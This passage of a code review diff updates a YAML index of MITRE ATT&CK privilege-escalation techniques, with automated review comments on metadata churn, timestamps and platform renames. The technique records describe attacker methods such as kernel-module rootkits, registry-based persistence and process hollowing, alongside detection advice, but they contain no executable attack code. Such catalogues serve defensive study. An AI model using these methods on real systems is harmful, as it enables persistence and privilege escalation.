+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
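Review bot: nearly all of this hunk is key reordering of the T1547.006 record rather than a content change; the only substantive differences visible are `x_mitre_attack_spec_version: 2.1.0` becoming `3.2.0`, the dropped `spec_version: '2.1'`, the iDefense Rootkit Overview reference moving to https with a September 12, 2024 retrieval date, and the `x_mitre_detection` block, which is re-emitted verbatim. If the generator serialises each technique mapping with a fixed key order (or preserves the upstream order), future regenerations will produce diffs that can actually be reviewed; the same churn recurs for T1546.004 further down. Also worth confirming that the regenerated record still carries a `modified` key, since the `- modified: '2022-05-11T14:00:00.188Z'` removal is in this hunk but its replacement is not within the visible part.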
@@ -20714,7 +21028,7 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
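Review bot: the `modified` timestamp for T1574.013 moves backwards, from '2022-05-11T14:00:00.188Z' to '2022-03-22T15:47:33.915Z', and the same regression appears in T1068, T1134.005, T1548.004, T1547.002, T1546.015 and T1574.009 in later hunks, always from a `14:00:00.188Z` value to an earlier, odd-second one. Together with `spec_version: '2.1'` being dropped from every record in the patch, this looks like the index was regenerated from a different ATT&CK export than last time rather than from newer data; the PR description should name the source and the ATT&CK release it corresponds to, and anyone consuming these indexes should not assume `modified` is monotonic across regenerations.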
@@ -20740,12 +21054,10 @@ privilege-escalation:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
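Review bot: T1574.013 ends up with no `x_mitre_attack_spec_version` at all: the `2.1.0` line is removed here and no replacement is added in any of the record's hunks, whereas T1547.006, T1078 and T1546.004 have theirs removed and re-added as `3.2.0`. T1134.005 has the same gap later in the patch. If that field is mirrored from upstream, confirm upstream really omits it for these two objects; if the generator is meant to stamp the current spec version on every technique, these two are missed.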
@@ -20823,9 +21135,8 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1574:
@@ -20892,7 +21203,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -20966,11 +21276,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -20987,7 +21296,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -20997,7 +21305,7 @@ privilege-escalation:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -21006,19 +21314,17 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
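Review bot: the platform list for T1078 drops Azure AD, Office 365 and Google Workspace in favour of Office Suite and Identity Provider (with `x_mitre_version` bumped to 2.7), and T1546 makes the same Office 365 to Office Suite change further down. Anything that groups techniques or tests by platform string will stop matching the three old names, so check that index outputs keyed on the old platform names are either regenerated under the new names or explicitly retired in this PR, rather than left behind as stale copies.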
@@ -21066,11 +21372,12 @@ privilege-escalation:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -21138,23 +21445,22 @@ privilege-escalation:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1068:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-04-07T17:13:54.168Z'
name: Exploitation for Privilege Escalation
description: |-
Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
@@ -21217,11 +21523,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -21274,8 +21579,8 @@ privilege-escalation:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -21323,78 +21628,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -21442,6 +21680,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -21452,9 +21694,13 @@ privilege-escalation:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -21463,8 +21709,67 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1134.005:
@@ -21510,7 +21815,7 @@ privilege-escalation:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -21535,13 +21840,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -21621,7 +21924,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.002:
technique:
@@ -21657,7 +21959,7 @@ privilege-escalation:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -21680,12 +21982,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -21763,12 +22064,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -21829,7 +22129,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -21873,7 +22172,7 @@ privilege-escalation:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -21895,7 +22194,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -21976,7 +22274,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -21999,7 +22296,7 @@ privilege-escalation:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -22029,12 +22326,10 @@ privilege-escalation:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -22119,7 +22414,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -22184,7 +22478,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1543.001:
@@ -22259,7 +22552,7 @@ privilege-escalation:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
